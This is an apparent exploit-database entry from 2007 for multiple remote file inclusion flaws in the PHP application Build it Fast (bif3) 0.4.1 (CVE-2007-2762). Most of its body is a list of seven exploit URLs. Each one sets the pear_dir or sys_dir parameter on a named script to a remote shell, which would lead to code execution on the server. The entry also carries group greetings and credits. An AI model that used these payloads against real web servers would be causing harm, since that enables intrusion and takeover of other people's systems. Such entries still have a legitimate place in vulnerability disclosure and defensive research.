Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusions
Author: Alkomandoz Hacker
type: webapps
platform: php
port:
date_added: 2007-05-16
date_updated:
verified: 1
codes: OSVDB-37955;CVE-2007-2762;OSVDB-37954;OSVDB-37953;OSVDB-37952;OSVDB-37951;OSVDB-37950;OSVDB-37949
tags:
aliases:
screenshot_url:
application_url:
# bif3-0.4.1 <= Remote File Include Vulnerablitiy
# D.Script: http://bif.lunix.com.ar/tgz/bif3-0.4.1.tgz
# Discovered by: Alkomandoz Hacker
# Homepage: asb-may.net & mohandko.com & sniper-sa.com
====================================
# Exploit:[Path]/Base/Application.php?pear_dir=Shell
# Exploit:[Path]/Widgets/Base/Footer.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifContainer.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifRoot.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifRoot2.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifRoot3.php?sys_dir=Shell
# Exploit:[Path]/Widgets/Base/widget.BifWarning.php?sys_dir=Shell
====================================
# Thanx: AsbMay's Group & City Of Ghosts Team & Sniper-sa Team
# Greetz To: Sniper_Sa & Devil-X
# milw0rm.com [2007-05-17]